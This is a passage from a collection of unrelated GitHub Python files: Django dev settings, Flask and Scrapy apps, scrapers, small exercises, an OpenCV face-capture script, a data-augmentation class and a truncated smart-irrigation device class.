.base import * # noqa F402\nimport os\n\n# -------------------------------------\n# DJANGO CONFIGURATION\n# -------------------------------------\n\n# Django Setup\n# =====================================\n\nALLOWED_HOSTS += ('docker.local', '.ngrok.io',) # noqa F405\nSECRET_KEY = env('SECRET_KEY', default='abcdefghijklmnopqrstuvwxyz') # noqa F405\n\nINSTALLED_APPS += ( # noqa F405\n 'debug_toolbar',\n 'storages',\n)\n\nMIDDLEWARE += ( # noqa F405\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(name)s %(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(asctime)s %(message)s'\n },\n },\n 'handlers': {\n 'stream': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n },\n 'applogfile': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': os.path.join(LOG_DIR, 'mission.log'),\n 'maxBytes': 1024 * 1024 * 15, # 15MB\n 'backupCount': 10,\n 'formatter': 'verbose'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['stream', ],\n 'level': LOG_LEVEL, # noqa F405\n # 'propagate': False,\n },\n 'django.db': {\n 'handlers': ['stream', ],\n 'level': LOG_LEVEL, # noqa F405\n # 'propagate': False,\n },\n 'z.pool': {\n 'handlers': ['stream', ],\n 'level': LOG_LEVEL, # noqa F405\n # 'propagate': False,\n },\n 'django': {\n 'handlers': ['stream', ],\n 'level': LOG_LEVEL, # noqa F405\n # 'propagate': False,\n },\n 'mission': {\n 'handlers': ['applogfile',],\n 'level': 'DEBUG',\n },\n }\n}\n\nINTERNAL_IPS = ('127.0.0.1',)\n\n\ndef show_toolbar(request):\n return True\n\n\nDEBUG_TOOLBAR_CONFIG = {\n 'SHOW_TOOLBAR_CALLBACK': show_toolbar,\n}\n\n\nMEDIA_URL = env('REMOTE_MEDIA_URL', default='/uploads/') # noqa F405\n\n# -------------------------------------\n# VENDOR CONFIGURATION\n# -------------------------------------\n\n\n# -------------------------------------\n# HSTS\n# -------------------------------------\n# NOTE: This was breaking staging\n# SECURE_SSL_REDIRECT = False\n","repo_name":"umair-cd/mission","sub_path":"site/apps/config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11505744562","text":"def solution(keyinput, board):\n answer = [0,0]\n bw = board[0]//2\n bh = board[1]//2\n # input을 반복문을 돌려서 그 자리가 나올때마다 answer변화시키기\n # board는 맵 크기, 맵 크기를 반으로 나눈 수를 초과하면 반대쪽으로 가야 됨\n for comm in keyinput:\n if comm == \"left\":\n answer[0] -= 1\n elif comm == \"right\":\n answer[0] += 1\n elif comm == \"up\":\n answer[1] += 1\n else:\n answer[1] -= 1\n \n if answer[0] > bw:\n answer[0] = bw\n elif answer[0] < -bw:\n answer[0] = -bw\n if answer[1] > bh:\n answer[1] = bh\n elif answer[1] < -bh:\n answer[1] = -bh\n \n return answer","repo_name":"muyaaho/python_coding","sub_path":"프로그래머스/lv0/120861. 캐릭터의 좌표/캐릭터의 좌표.py","file_name":"캐릭터의 좌표.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21089579726","text":"# f1 file buffer\n# f2 file buffer\nimport pandas as pd\nfrom flask import Flask, request, render_template, make_response\nimport io\n\n\ndef read_file_csv(file):\n df = pd.read_csv(file, encoding='utf-16', sep='\\t')\n\n return df\n\n\ndef merge(f1, f2):\n # f1 and f2 are files recieved in Flask request.files\n # check the file type\n\n print('Check 0')\n print(f1.filename.split(\".\")[-1])\n print(f2.filename.split(\".\")[-1])\n\n if f1.filename.split(\".\")[-1] == \"csv\":\n df1 = read_file_csv(f1)\n\n print('Check 0.5')\n if f2.filename.split(\".\")[-1] == \"csv\":\n df2 = read_file_csv(f2)\n\n print('Check 1')\n\n # check for excel\n if f1.filename.split(\".\")[-1] == \"xlsx\" or f1.filename.split(\".\")[-1] == \"xls\":\n df1 = pd.read_excel(f1)\n if f2.filename.split(\".\")[-1] == \"xlsx\" or f2.filename.split(\".\")[-1] == \"xls\":\n df2 = pd.read_excel(f2)\n\n # merge the files\n df = pd.concat([df1, df2], axis=0, ignore_index=True)\n\n print(df1.columns)\n print(df2.columns)\n\n buffer = io.BytesIO()\n wtiter = pd.ExcelWriter(buffer)\n df.to_excel(wtiter, index=False)\n wtiter.close()\n\n buffer.seek(0)\n\n return buffer\n\n\n# make a flask endpoint\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"POST\":\n f1 = request.files[\"f1\"]\n f2 = request.files[\"f2\"]\n # call the merge function\n merged_buffer = merge(f1, f2)\n\n response = make_response(merged_buffer)\n response.headers[\"Content-Type\"] = \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n response.headers[\"Content-Disposition\"] = \"attachment; filename=merged.xlsx\"\n\n return response\n\n return render_template(\"index.html\")\n\n# @app.route(\"/merge\", methods=[\"POST\"])\n# def merge_files():\n# f1 = request.files[\"f1\"]\n# f2 = request.files[\"f2\"]\n# # call the merge function\n# merged_buffer = merge(f1, f2)\n\n# response = make_response(merged_buffer)\n# response.headers[\"Content-Type\"] = \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n# response.headers[\"Content-Disposition\"] = \"attachment; filename=merged.xlsx\"\n\n# return response\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"PriyanshuSharma23/excel-merger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7295751848","text":"from functools import *\r\n\r\n# filter(function, list) ==> returns the values if the operation result of them is true\r\nnums = [3, 2, 6, 8, 4, 6, 2, 9]\r\n\r\n'''\r\ndef is_even(n):\r\n return n % 2 == 0 # if true, return true to filter function, otherwise, return false to filter function\r\n'''\r\n\r\n# Check how many even numbers in the list `nums`\r\nevens = list(filter(lambda n: n % 2 == 0, nums)) # if true, it returns the numbers; if false, break.\r\nprint(evens) # [2, 6, 8, 4, 6, 2]\r\n\r\n# Map(function, list) ==> perform a change to the all elements of the list\r\n# we want now to double all values of the evens list\r\ndoubles = list(map(lambda a: a ** 2, evens))\r\nprint(doubles) # [4, 36, 64, 16, 36, 4]\r\n\r\n# reduce(function, sequence) ==>\r\n# Now, we want to add the values of doubles list\r\nsums = reduce(lambda a, b: a + b, doubles)\r\nprint(sums) # 160\r\n","repo_name":"HendEmad/Coding","sub_path":"Python/Basics/Functions/Filter, Map, and Reduce.py","file_name":"Filter, Map, and Reduce.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18244294090","text":"import requests as r\r\n\r\nclass Sc:\r\n def Main():\r\n user = str(input(\"[Input Link] >_ \"))\r\n req = r.get(user)\r\n if req.status_code == 200:\r\n g = open(\"Result.html\", \"w+\")\r\n g.write(req.text)\r\n g.close()\r\n else:\r\n print(\"[!] Check Your Connection\")","repo_name":"FajarTheGGman/RoseKiller","sub_path":"content/sc.py","file_name":"sc.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"57362803","text":"from PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtSql import QSqlDatabase, QSqlQuery, QSqlDriver, QSqlError\n\nfrom db.db_constant import DbConstant\nfrom util.log import Log\n\n\"\"\"\nThe QSqlQuery::exec() function returns a bool value that indicates if\nthe request has been successful. In your production code, always check\nthis value. You can further investigate the error\nwith QSqlQuery::lastError(). \n\"\"\"\n\n\nclass DbManager:\n\n def __init__(self):\n self._conn: QSqlDatabase = None\n self._driver: QSqlDriver = None\n\n def create(self) -> QSqlDatabase:\n \"\"\"\n\n :return:\n \"\"\"\n self._conn = QSqlDatabase.addDatabase(DbConstant.DB_TYPE)\n self._conn.setDatabaseName(DbConstant.DB_NAME)\n\n self._driver = self._conn.driver()\n Log.i(\"Database Driver: %s\" % self._conn.driverName())\n\n if not self._conn.open():\n QMessageBox.critical(None, \"Cannot open database\",\n \"Unable to establish a database connection.\\n\"\n \"This example needs SQLite support. Please read the Qt SQL \"\n \"driver documentation for information how to build it.\\n\\n\"\n \"Click Cancel to exit.\",\n QMessageBox.Cancel)\n return None\n Log.i(\"DB Connection established\")\n return self._conn\n\n def get_connection(self):\n if self._conn is None:\n self._conn = QSqlDatabase.addDatabase('QSQLITE')\n self._conn.setDatabaseName('docker.db')\n self._conn.open()\n return self._conn\n\n def get_api_versions(self):\n result = []\n query = QSqlQuery(self._conn)\n query.exec(\"select * from docker_av_api_version\")\n rec = query.record()\n while query.next():\n result.append({'name': query.value(rec.indexOf('av_name')),\n 'value': query.value(rec.indexOf('av_value'))})\n return result\n\n def close(self):\n if self._conn is not None:\n self._conn.close()\n\n def debug(self, query: QSqlQuery):\n if query.lastError().type() == QSqlError.NoError:\n print(\"Query OK: %s \" % query.lastQuery())\n else:\n print(\"Query Error: %s [%s]\" % (query.lastError().text(), query.lastQuery()))","repo_name":"jeanbritz/pyqt-docker-client","sub_path":"db/db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72111024147","text":"# -*- coding:utf-8 -*-\n\nfrom random import randint\n\nx = randint(0,300)\ngo = 'y'\nwhile (go == 'y'):\n\tprint ('please input a number between 0~300:')\n\tdigit = int(input())\n\tif digit == x:\n\t\tprint ('Bingo!')\n\t\tbreak\n\telif digit > x:\n\t\tprint ('Too big, please try again.')\n\telse:\n\t\tprint ('Too small, please try again.')\n\tprint ('if you do not want to continue, input n, or input y')\n\tgo = input()\nelse:\n\tprint ('Goodbye!')\n","repo_name":"yang-hope/Python","sub_path":"Basics/guessnum.py","file_name":"guessnum.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38696891191","text":"\nfrom itemadapter import ItemAdapter\nfrom myproana.models import db_connect, create_table, Author, Thread, Subforum, Post, Authorinfo\nimport sqlalchemy.orm as orm\nfrom myproana.items import ThreadItem, PostItem\nfrom sqlalchemy import exc\n\n\nclass MyproanaPipeline:\n def __init__(self):\n \"\"\"\n Initializes database connection and sessionmaker\n Creates tables\n \"\"\"\n engine = db_connect()\n create_table(engine)\n self.Session = orm.sessionmaker(bind=engine)\n\n def process_item(self, item, spider):\n \"\"\"Save quotes in the database\n This method is called for every item pipeline component\n \"\"\"\n\n if isinstance(item, ThreadItem):\n self.process_thread(item, spider)\n if isinstance(item, PostItem):\n self.process_post(item, spider)\n\n def process_thread(self, item, spider):\n # Process thread data and prepare the model for db\n session = self.Session()\n thread = Thread()\n author = Author()\n subforum = Subforum()\n\n author.name = item[\"authorname\"]\n thread.title = item[\"threadtitle\"]\n thread.startdate = item[\"startdate\"]\n thread.url = item[\"url\"]\n subforum.name = item[\"subforumname\"]\n\n exist_author = session.query(Author).filter_by(name=author.name).first()\n if exist_author is not None: # the current author exists\n thread.author_id = exist_author.id\n else:\n thread.author = author\n\n exist_subforum = session.query(Subforum).filter_by(name=subforum.name).first()\n if exist_subforum is not None: # the current subforum exists\n thread.subforum_id = exist_subforum.id\n else:\n thread.subforum = subforum\n\n try:\n session.add(thread)\n session.flush()\n session.commit()\n except:\n session.rollback()\n raise\n\n finally:\n session.close()\n session.close()\n\n return item\n\n def process_post(self, item, spider):\n # Process post data and prepare the model for db\n session = self.Session()\n thread = Thread()\n author = Author()\n post = Post()\n authorinfo = Authorinfo()\n\n post.content = item[\"postcontent\"]\n post.date = item[\"date\"]\n post.sign = item[\"authorsign\"]\n post.noposts = item[\"noposts\"]\n author.name = item[\"authorname\"]\n thread.title = item[\"threadtitle\"]\n authorinfo.type = item[\"authortype\"]\n\n authorinfo.author = author\n\n exist_author = session.query(Author).filter_by(name=author.name).first()\n if exist_author is not None: # the current author exists\n post.author_id = exist_author.id\n else:\n post.author = author\n\n exist_thread = session.query(Thread).filter_by(title=thread.title).first()\n post.thread_id = exist_thread.id\n\n\n try:\n session.add(post)\n session.commit()\n except:\n session.rollback()\n raise\n\n finally:\n session.close()\n session.close()\n\n return item\n\n","repo_name":"saeedrahmo/myproana","sub_path":"myproana/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7824950234","text":"from collections import Counter\n\nclass Solution(object):\n def shortestCompletingWord(self, licensePlate, words):\n \"\"\"\n :type licensePlate: str\n :type words: List[str]\n :rtype: str\n \"\"\"\n licensePlate = \"\".join([x for x in licensePlate if x not in \" 1234567890\" ])\n c = Counter(licensePlate.lower())\n total = sum(c.values())\n words = sorted(words, key=lambda x: len(x))\n for w in words:\n if len(w) < total:\n continue\n c2 = Counter(w.lower())\n flag = 0\n for k in c.keys():\n if c2.get(k, 0) < c[k]:\n flag = 1\n break\n if flag == 0:\n return w\n\n\ns = Solution()\nprint(s.shortestCompletingWord(licensePlate = \"1s3 PSt\", words = [\"step\", \"steps\", \"stripe\", \"stepple\"]))","repo_name":"0as1s/leetcode","sub_path":"748_shortestCompletingWord.py","file_name":"748_shortestCompletingWord.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19176919640","text":"from bs4 import BeautifulSoup\nimport requests\n\n\ndef main():\n url = 'https://googleyasheck.com'\n\n req = requests.get(url)\n if req.status_code == requests.codes.ok:\n html = req.text\n\n soup = BeautifulSoup(html, 'html.parser')\n for page in soup.find_all('article', 'post'):\n href = page.h2.a['href']\n title = page.h2.text.strip()\n date = page.footer.time.text.strip()\n\n print('{title} ({date}): {domain}{url}'.format(title=title, url=href, date=date, domain=url))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jwasham/practice-python","sub_path":"experiments/blog_posts.py","file_name":"blog_posts.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1548,"dataset":"github-code","pt":"48"} +{"seq_id":"10813814545","text":"from django.db import transaction\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom wagtail.admin import messages\n\nimport requests\n\nfrom .models import Grid, Package\n\n\ndef process(url=\"https://djangopackages.org/api/v4/grids/?q=wagtail\"):\n grid_data = requests.get(url).json()\n for item in grid_data.get(\"results\", []):\n title = item.get(\"title\", \"\")\n if \"wagtail\" in title.lower():\n defaults = {key: item[key] for key in [\"title\", \"slug\", \"description\"]}\n grid, _ = Grid.objects.update_or_create(\n uid=item.get(\"id\"), defaults=defaults\n )\n for url in item.get(\"packages\", []):\n package_data = requests.get(url).json()\n defaults = {\n key: package_data[key]\n for key in [\n \"title\",\n \"slug\",\n \"repo_url\",\n \"pypi_version\",\n \"repo_forks\",\n \"repo_description\",\n \"pypi_url\",\n \"documentation_url\",\n \"repo_watchers\",\n \"participants\",\n ]\n if package_data[key] is not None\n }\n package, _ = Package.objects.update_or_create(\n uid=package_data.get(\"id\"), defaults=defaults\n )\n grid.packages.add(package)\n\n url = grid_data.get(\"next\")\n if url:\n process(url)\n\n\nclass IndexView(View):\n http_method_names = [\"get\", \"post\"]\n\n def post(self, request):\n with transaction.atomic():\n # Start fresh, remove all m2m's.\n [grid.packages.clear() for grid in Grid.objects.all()]\n process()\n messages.success(request, \"Success\")\n return self.get(request)\n\n def get(self, request):\n return render(\n request,\n \"packages/index.html\",\n {},\n )\n","repo_name":"wagtail/wagtail.org","sub_path":"wagtailio/packages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"48"} +{"seq_id":"14529169919","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 1 23:12:02 2016\n\n@author: Walatima\n\"\"\"\n\nimport os\nimport cv2\n\nclass ctakeimage():\n \n def takeimage():\n \n maxid = 0\n for file in os.listdir('dataSet'):\n #print(maxid)\n word = file.split('.')\n \n if(maxid < int(word[1])):\n maxid = int(word[1])\n print(maxid)\n \n #faceId = str(maxid + 1) #use an integer or something change this when getting a new face\n faceId = str(maxid+1)\n num=0 # just a count thing number\n cam = cv2.VideoCapture(0)\n detector=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n \n while(True):\n ret,img = cam.read()\n cv2.imshow('frame',img)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = detector.detectMultiScale(gray, 1.3, 5)\n print(\"1\")\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n print(\"2\")\n num=num+1\n cv2.imwrite(\"dataSet/User.\"+faceId +'.'+ str(num) + \".jpg\", gray[y:y+h,x:x+w])\n print(\"3\")\n cv2.imshow('frame',img)\n \n if cv2.waitKey(200) & 0xFF == ord('q'):\n break\n elif (num>30): #taking 30 images for training purposes ;)\n cam.release()\n cv2.destroyAllWindows()\n break\n \n \nctakeimage.takeimage()\n'''def takefaces():\n with open('peopledata.csv','r', newline = '') as fp:\n print()\n for line in fp:\n word = line.split(',')\n if (word[0] == faceids):\n print(word)'''\n \n","repo_name":"ShahirAnsari/Facedetection_and_recognition","sub_path":"dataGen2.py","file_name":"dataGen2.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37254176942","text":"import os\nimport re\nimport sys\nimport spacy\nimport codecs\n\nlang = sys.argv[1]\ngt_dir = lang + '/clean/'\n\nlang_model = {'es':'es_core_news_sm', 'fr':'fr_core_news_sm', 'it':'it_core_news_sm', 'ru':'xx_ent_wiki_sm'}\nnlp = spacy.load(lang_model[lang]) \n\nif lang == 'ru':\n nlp.add_pipe(nlp.create_pipe('sentencizer'))\n\ndef sent_tokenize(sentences):\n splitted_and_tokenized = \"\"\n\n doc = nlp(sentences) \n for sent in doc.sents:\n splitted_and_tokenized += \" \".join(\n [tok.text for tok in sent if not tok.text.isspace()]).strip() + '\\n'\n\n splitted_and_tokenized = splitted_and_tokenized.strip()\n return splitted_and_tokenized\n\nprint (\" ---------- TIMELINE TOKENIZE ----------\\n\")\nfor f in os.listdir(gt_dir):\n sentences = \"\"\n f_out = \"\"\n filename = gt_dir + f\n \n with codecs.open(filename, \"r\", encoding=\"utf-8\", errors=\"ignore\") as fp:\n for line in fp.readlines():\n if line[0].isdigit() or line == '--------------------------------':\n f_out += line\n else:\n tokenized = sent_tokenize(line)\n f_out += tokenized + '\\n'\n \n with open(filename, 'w', encoding=\"utf-8\") as file:\n file.write(f_out)\n","repo_name":"MorenoLaQuatra/multilingual_ts","sub_path":"timelines_preprocessing.py","file_name":"timelines_preprocessing.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35572972664","text":"from rest_framework import generics, permissions, mixins, decorators, viewsets\n\n\nclass ActionPermissionMixin:\n \"\"\"\n Миксин permissions для action\n \"\"\"\n def get_permissions(self):\n try:\n return [permission() for permission in self.permission_classes_by_action[self.action]]\n except KeyError:\n return [permission() for permission in self.permission_classes]\n\n\nclass ActionSerializerMixin:\n \"\"\"\n Миксин serializers для action\n \"\"\"\n serializer_class_by_action = None\n\n def get_serializer_class(self):\n try:\n return self.serializer_class_by_action[self.action]\n except KeyError:\n return self.serializer_class\n\n\nclass CreateRetrieveUpdateDestroy(mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n ActionPermissionMixin,\n viewsets.GenericViewSet):\n \"\"\"\n \"\"\"\n pass\n","repo_name":"SkySock/artifact","sub_path":"src/base/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1777095802","text":"from builtins import object, range\n\nimport numpy as np\nfrom copy import deepcopy\n\nfrom batchgenerators.augmentations.utils import create_zero_centered_coordinate_mesh, interpolate_img, rotate_coords_2d, \\\n rotate_coords_3d, uncenter_coords\n\n\nclass InvertibleRotationGenerator(object):\n \"\"\"\n Enables rotatation of batch data received from a generator object and the inverse roatation\n Use-case: Use rotations in the prediction step and rotate back the results\n Use like:\n batch_gen = SomeBatchGenerator(SomeData)\n inv_rot_batch_gen = InvertibleRotationGenerator(batch_gen)\n batch_gen = inv_rot_batch_gen.generate()\n batch, rotated_batch = next(batch_gen)\n inverse_rotated_batch = inv_rot_batch_gen.invert(rotated_batch)\n \"\"\"\n\n def __init__(self, generator, angle_x=(0, 2 * np.pi), angle_y=(0, 2 * np.pi), angle_z=(0, 2 * np.pi),\n border_mode_data='nearest', border_cval_data=0, order_data=3,\n border_mode_seg='constant', border_cval_seg=0, order_seg=0, seed=42):\n\n np.random.seed(seed)\n self.generator = generator\n self.params = {'ax': angle_x, 'ay': angle_y, 'az': angle_z,\n 'bmode_data': border_mode_data, 'bmode_seg': border_mode_seg,\n 'bcval_data': border_cval_data, 'bcval_seg': border_cval_seg,\n 'order_data': order_data, 'order_seg': order_seg}\n\n self.rand_params = {}\n\n def rotate(self, data_dict):\n data = data_dict[\"data\"]\n do_seg = False\n seg = None\n if \"seg\" in list(data_dict.keys()):\n seg = data_dict[\"seg\"]\n do_seg = True\n shape = np.array(data.shape[2:])\n dim = len(shape)\n for sample_id in range(data.shape[0]):\n coords = create_zero_centered_coordinate_mesh(shape)\n\n if dim == 3:\n coords = rotate_coords_3d(coords,\n self.rand_params['ax'][sample_id],\n self.rand_params['ay'][sample_id],\n self.rand_params['az'][sample_id])\n else:\n coords = rotate_coords_2d(coords, self.rand_params['ax'][sample_id])\n coords = uncenter_coords(coords)\n for channel_id in range(data.shape[1]):\n data[sample_id, channel_id] = interpolate_img(data[sample_id, channel_id], coords,\n self.params['order_data'], self.params['bmode_data'],\n cval=self.params['bcval_data'])\n if do_seg:\n for channel_id in range(seg.shape[1]):\n seg[sample_id, channel_id] = interpolate_img(seg[sample_id, channel_id], coords,\n self.params['order_seg'], self.params['bmode_seg'],\n cval=self.params['bcval_seg'])\n\n return {'data': data, 'seg': seg}\n\n def generate(self):\n\n for data_dict in self.generator:\n assert \"data\" in list(\n data_dict.keys()), \"your data generator needs to return a python dictionary with at least a 'data' key value pair\"\n\n self.shape = np.array(data_dict[\"data\"].shape[2:])\n self.dim = len(self.shape)\n\n self.rand_params['ax'] = np.random.uniform(self.params['ax'][0], self.params['ax'][1], size=self.shape[0])\n if self.dim == 3:\n self.rand_params['ay'] = np.random.uniform(self.params['ay'][0], self.params['ay'][1],\n size=self.shape[0])\n self.rand_params['az'] = np.random.uniform(self.params['az'][0], self.params['az'][1],\n size=self.shape[0])\n\n initial_data_dict = deepcopy(data_dict)\n rotated_data_dict = self.rotate(data_dict)\n yield initial_data_dict, rotated_data_dict\n\n def invert(self, data_dict):\n\n rotated_data_dict = deepcopy(data_dict)\n self.rand_params['ax'] = -self.rand_params['ax']\n if self.dim == 3:\n self.rand_params['ay'] = -self.rand_params['ay']\n self.rand_params['az'] = -self.rand_params['az']\n\n return self.rotate(rotated_data_dict)\n","repo_name":"ORippler/MSD_2018","sub_path":"batchgenerators/generators/invertible_rotation_generator.py","file_name":"invertible_rotation_generator.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"73851736787","text":"\"\"\" Same as m1e_communication but without comments, to focus on the code. \"\"\"\n\nimport tkinter\nfrom tkinter import ttk\n\nimport old_mqtt_for_csse120 as communicator\n\n\ndef main(who_am_i):\n game = Game(who_am_i)\n game.start()\n\n\nclass Game(object):\n def __init__(self, who_am_i):\n self.gui = GUI(self)\n canvas = self.gui.canvas\n receiver = communicator.Receiver(self)\n self.sender = communicator.Sender(receiver, \"something_unique\",\n who_am_i)\n if who_am_i == 1:\n color = \"blue\"\n else:\n color = \"red\"\n self.ball = Ball(color, canvas)\n\n def start(self):\n self.gui.start()\n\n def act_on_message_received(self, message):\n message_parts = message.split()\n x = int(message_parts[0])\n y = int(message_parts[1])\n self.ball.move_to(x, y)\n\n def send_xy(self, x, y):\n self.sender.send_message(\"{} {}\".format(x, y))\n\n\nclass GUI(object):\n def __init__(self, game):\n self.game = game\n self.root = tkinter.Tk()\n self.frame = ttk.Frame(self.root, padding=10)\n self.frame.grid()\n self.canvas = self.make_canvas()\n self.make_chooser_for_xy()\n\n def make_canvas(self):\n canvas_width = 400\n canvas_height = 300\n canvas = tkinter.Canvas(self.frame, width=canvas_width,\n height=canvas_height)\n canvas.width = canvas_width\n canvas.height = canvas_height\n canvas.grid()\n return canvas\n\n def make_chooser_for_xy(self):\n entry_for_x = ttk.Entry(self.frame)\n entry_for_y = ttk.Entry(self.frame)\n send_button = ttk.Button(self.frame, text=\"Send X and Y\")\n send_button[\"command\"] = lambda: self.send_xy(entry_for_x, entry_for_y)\n entry_for_x.grid()\n entry_for_y.grid()\n send_button.grid()\n\n def send_xy(self, entry_for_x, entry_for_y):\n x = int(entry_for_x.get())\n y = int(entry_for_y.get())\n self.game.send_xy(x, y)\n\n def start(self):\n self.root.mainloop()\n\n\nclass Ball(object):\n def __init__(self, color, canvas):\n self.canvas = canvas\n x = 200\n y = 200\n self.diameter = 20\n self.id = self.canvas.create_oval(x, y,\n x + self.diameter, y + self.diameter,\n fill=color)\n\n def move_to(self, x, y):\n self.canvas.coords(self.id, x, y, x + self.diameter, y + self.diameter)\n","repo_name":"RHIT-CSSE/csse120-public","sub_path":"PythonProjects-Archived/23-OldTkinterAnimation/src_legacy/m1e_communication_without_comments.py","file_name":"m1e_communication_without_comments.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17744849862","text":"import os\nimport shutil\n\ndef remove_colmap(basedir):\n remove_list = ['database.db', 'colmap_output.txt', 'poses_bounds.npy', 'sparse']\n\n for idx in remove_list:\n file_path = os.path.join(basedir, idx)\n if os.path.isdir(file_path) and not os.path.islink(file_path):\n print(f'removing {file_path}')\n shutil.rmtree(file_path)\n elif os.path.exists(file_path):\n print(f'removing {file_path}')\n os.remove(file_path)\n\n\nif __name__ == \"__main__\":\n print('REMOVE COLMAP Files')\n basedir = '/home/brozserver3/brozdisk/data/nerf/colmap_test_data/llff/fern'\n remove_colmap(basedir)\n \n\n","repo_name":"nuggy875/NeRF_pytorch_paeng","sub_path":"dataset/colmap/rmtest.py","file_name":"rmtest.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"31554863322","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\nif __name__ == '__main__':\n fig, axs = plt.subplots(3, 1, sharex=True)\n\n for ax, label in zip(axs, ('k1a4', 'k2a2', 'k1a6')):\n\n df = pd.read_csv(\n './data/{}.csv'.format(label),\n header=2, names=['t', 'U'],\n )\n\n df['t'] = (df['t'] - df['t'].min()) * 1e6\n ax.plot('t', 'U', data=df, label=label)\n ax.set_ylabel(r'$U \\mathbin{/} \\si{\\volt}$')\n ax.legend(loc='upper left')\n\n axs[2].set_xlabel(r'$t \\mathbin{/} \\si{\\micro\\second}$')\n axs[2].set_xlim(0, 5)\n\n fig.tight_layout(pad=0, h_pad=0.5)\n fig.savefig('build/unknown.pdf')\n","repo_name":"maxnoe/tudo_masterfp","sub_path":"v52_leitungen/scripts/plot_unknown.py","file_name":"plot_unknown.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41064596904","text":"from .base_device import BaseDevice\nimport uuid\n\n\nclass SmartIrrigationControl(BaseDevice):\n def __init__(self, location, device_map):\n \"\"\"Constructor for the smart irrigation control device.\"\"\"\n BaseDevice.__init__(self, location, device_map[\"COMMON\"][0][\"id\"])\n self.type = \"SMART_IRRIGATION_CONTROL\"\n self.valve_set_id = \"N/A\"\n self.valve_set_state = \"N/A\"\n self.valve_set_last_error_code = \"N/A\"\n self.valves = {}\n self.setup_values_from_device_map(device_map)\n\n def _set_valves_map_value(\n self, target_map, source_map, value_name_in_source, value_name_in_target=None\n ):\n if not value_name_in_target:\n value_name_in_target = value_name_in_source\n if value_name_in_source in source_map:\n target_map[value_name_in_target] = source_map[value_name_in_source][\"value\"]\n else:\n target_map[value_name_in_target] = \"N/A\"\n\n def update_device_specific_data(self, device_map):\n if device_map[\"type\"] == \"VALVE_SET\":\n # SmartIrrigationControl has only one item\n self.valve_set_id = device_map[\"id\"]\n self.set_attribute_value(\"valve_set_state\", device_map, \"state\")\n self.set_attribute_value(\n \"valve_set_last_error_code\", device_map, \"lastErrorCode\"\n )\n if device_map[\"type\"] == \"VALVE\":\n self.valves[device_map[\"id\"]] = {\"id\": device_map[\"id\"]}\n self._set_valves_map_value(\n self.valves[device_map[\"id\"]], device_map[\"attributes\"], \"activity\"\n )\n self._set_valves_map_value(\n self.valves[device_map[\"id\"]],\n 